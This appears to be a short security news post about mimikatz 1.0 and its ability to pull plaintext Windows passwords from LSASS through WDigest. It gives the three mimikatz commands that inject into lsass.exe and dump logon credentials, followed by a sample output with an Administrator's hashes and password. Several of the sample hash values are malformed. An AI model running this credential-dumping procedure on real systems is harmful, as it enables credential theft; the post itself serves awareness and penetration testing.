A new version of Windows credentials management software mimikatz 1.0 has recently been released. This new version, besides from its usual functionality, gained ability to disclose local user passwords.
Vulnerability used by mimikatz exists due to implementation of WDigest.dll library, which is a part of Windows authentication mechanism. A characteristic feature of SSO (Single Sign On) compatible HTTP Digest Authentication mechanism is the use of plain-text passwords. That is why Windows developers, probably counting on security by obscurity, decided to keep the loged in users’ creds unencrypted.
Those who want to take advantage of mimikatz to disclose local user credentials should perform these actions:
mimikatz # privilege::debug
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords
You will follow similar output:
mimikatz # privilege::debug Demande d'ACTIVATION du privilege : SeDebugPrivilege : OK mimikatz # inject::process lsass.exe sekurlsa.dll PROCESSENTRY32(lsass.exe).th32ProcessID = 680 Attente de connexion du client... Serveur connecte a un client ! Message du processus : Bienvenue dans un processus distant Gentil Kiwi SekurLSA : librairie de manipulation des donnees de securites dans LSASS mimikatz # @getLogonPasswords Authentification Id : 0;248844 Package d'authentification : NTLM Utilisateur principal : ANONYMOUS LOGON Domaine d'authentification : NT AUTHORITY msv1_0 : n.t. (LUID KO) wdigest : n.t. (LUID KO) tspkg : n.t. (LUID KO) Authentification Id : 0;996 Package d'authentification : Negotiate Utilisateur principal : PC01$ Domaine d'authentification : WORKGROUP msv1_0 : n.t. (LUID KO) wdigest : tspkg : n.t. (LUID KO) Authentification Id : 0;575543 Package d'authentification : NTLM Utilisateur principal : Administrator Domaine d'authentification : PC01 msv1_0 : lm{ 336dcb9831c8a03dka9872550c3cee6 }, ntlm{ 76af46e798f45ceb87805ba95380b39ed } wdigest : password tspkg : password Authentification Id : 0;997 Package d'authentification : Negotiate Utilisateur principal : LOCAL SERVICE Domaine d'authentification : NT AUTHORITY msv1_0 : n.t. (LUID KO) wdigest : tspkg : n.t. (LUID KO) Authentification Id : 0;62105 Package d'authentification : NTLM Utilisateur principal : Domaine d'authentification : msv1_0 : n.t. (LUID KO) wdigest : n.t. (LUID KO) tspkg : n.t. (LUID KO) Authentification Id : 0;999 Package d'authentification : NTLM Utilisateur principal : PC01$ Domaine d'authentification : WORKGROUP msv1_0 : n.t. (LUID KO) wdigest : tspkg : n.t. (LUID KO) mimikatz #
The functionality of mimikatz is currently being implemented in Metasploit Framework and can be used by cybercrooks & pentesters.
mimikatz can be downloaded here (external link).
Detailed description of the vulnerability can be viewed here.